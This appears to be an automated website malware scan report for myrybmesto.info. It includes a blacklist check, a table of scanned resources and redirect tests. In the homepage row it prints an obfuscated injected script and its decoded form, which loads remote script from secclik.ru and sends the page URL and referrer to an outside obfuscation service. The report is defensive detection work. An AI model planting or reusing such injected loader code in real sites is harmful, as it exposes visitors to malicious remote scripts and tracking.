Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=myrybmesto.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://myrybmesto.info/ | 200 OK Content-Length: 51455 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: secclik.ru var _110='==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSSJ9EKkxWaoNEZuVGcwFmLPBTSKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIPBTSgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuUGdhN2c1ZmYvlXbukGch9yL6AHd0h2Jg0DIjJ3cukUSPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ASSJ9EIyFmd7cSRzUCdwlmcjN3LDNTJFNTJyITJ2EDM3Q0MlQWaGNTJwhGcuIXZsRmb ...[978 bytes skipped]... Decoded script: var _escape='%3Cscript%20type%3D%22text/javascript%22%20%20src%3D%22http%3A//secclik.ru/handler.php%3Fid%3D7016%22%3E%3C/script%3E';var OII = document.createElement('script'); OII.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var I0O = document.getElementsByTagName('head')[0]; I0O.appendChild(OII);document.write(unescape(_escape)); var _escape='%3Cscript%20type%3D%22text/javascript%22%20%20src%3D%22http%3A//secclik.r ...[360 bytes skipped]... | ||
http://myrybmesto.info/engine/classes/js/menu.js | 404 Not Found Content-Length: 304 Content-Type: text/html | clean |
http://myrybmesto.info/test404page.js | 404 Not Found Content-Length: 293 Content-Type: text/html | clean |
http://myrybmesto.info/engine/classes/js/dle_ajax.js | 200 OK Content-Length: 7633 Content-Type: application/x-javascript | clean |
http://myrybmesto.info/engine/classes/js/js_edit.js | 200 OK Content-Length: 8791 Content-Type: application/x-javascript | clean |
http://myrybmesto.info/engine/classes/highslide/highslide.js | 200 OK Content-Length: 57199 Content-Type: application/x-javascript | clean |
http://secclik.ru/handler.php?id=7016 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://myrybmesto.info/engine/gallery/ajax/js_gallery.js | 404 Not Found Content-Length: 312 Content-Type: text/html | clean |
http://informers.sinoptik.ua/js3.php?title=2&wind=1&cities=303010783,303018950,303027839&lang=ru | 200 OK Content-Length: 1854 Content-Type: text/html | clean |
http://myrybmesto.info/engine/skins/default.js | 200 OK Content-Length: 3509 Content-Type: application/x-javascript | clean |
http://counter.rambler.ru/top100.jcn?2379754 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://goo.gl/HkbW6T | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Wed, 21 Jan 2015 20:23:36 GMT Pragma: no-cache Accept-Ranges: none Age: 79 Location: http://vk.cc/39soEO Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Mon, 01 Jan 1990 00:00:00 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://vk.cc/39soeo | HTTP/1.1 302 Found Cache-Control: no-store Connection: close Date: Wed, 21 Jan 2015 20:24:55 GMT Pragma: no-cache Location: https://vk.com/yumi.murakami?w=wall139071697_3499%2F842c79d5dda9037417 Server: Apache Content-Length: 0 Content-Type: text/html; charset=windows-1251 X-Powered-By: PHP/3.10578 | clean |
https://vk.com/yumi.murakami?w=wall139071697_3499%2f842c79d5dda9037417 | HTTP/1.1 200 OK Cache-Control: no-store Connection: close Date: Wed, 21 Jan 2015 20:24:55 GMT Pragma: no-cache Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=windows-1251 Set-Cookie: remixlang=3; expires=Tue, 26-Jan-2016 13:00:13 GMT; path=/; domain=.vk.com Set-Cookie: remixstid=1802706656_cea7484f3d2de51350; expires=Wed, 20-Jan-2016 09:00:33 GMT; path=/; domain=.vk.com X-Frame-Options: deny X-Powered-By: PHP/5.4.4-14+deb7u14 | clean |
https://vk.com/badbrowser.php | 200 OK Content-Length: 3525 Content-Type: text/html | clean |
https://vk.com/js/iepngfix_tilebg.js?1 | 200 OK Content-Length: 4516 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: myrybmesto.info
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 21 Jan 2015 20:24:52 GMT
Pragma: no-cache
Server: nginx/1.0.15
Content-Type: text/html; charset=WINDOWS-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 21 Jan 2015 13:24:52 GMT
Set-Cookie: PHPSESSID=f81628daa36f2b59df3b6e6ec1f4538e; path=/
Set-Cookie: dle_user_id=deleted; expires=Tue, 21-Jan-2014 20:24:51 GMT; path=/; domain=.myrybmesto.info; httponly
Set-Cookie: dle_password=deleted; expires=Tue, 21-Jan-2014 20:24:51 GMT; path=/; domain=.myrybmesto.info; httponly
Set-Cookie: dle_hash=deleted; expires=Tue, 21-Jan-2014 20:24:51 GMT; path=/; domain=.myrybmesto.info; httponly
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: myrybmesto.info
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 21 Jan 2015 20:24:52 GMT
Pragma: no-cache
Server: nginx/1.0.15
Content-Type: text/html; charset=WINDOWS-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 21 Jan 2015 13:24:52 GMT
Set-Cookie: PHPSESSID=f81628daa36f2b59df3b6e6ec1f4538e; path=/
Set-Cookie: dle_user_id=deleted; expires=Tue, 21-Jan-2014 20:24:51 GMT; path=/; domain=.myrybmesto.info; httponly
Set-Cookie: dle_password=deleted; expires=Tue, 21-Jan-2014 20:24:51 GMT; path=/; domain=.myrybmesto.info; httponly
Set-Cookie: dle_hash=deleted; expires=Tue, 21-Jan-2014 20:24:51 GMT; path=/; domain=.myrybmesto.info; httponly
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: myrybmesto.info
Referer: http://www.google.com/search?q=myrybmesto.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: myrybmesto.info
Referer: http://www.google.com/search?q=myrybmesto.info
Result:
The result is similar to the first query. There are no suspicious redirects found.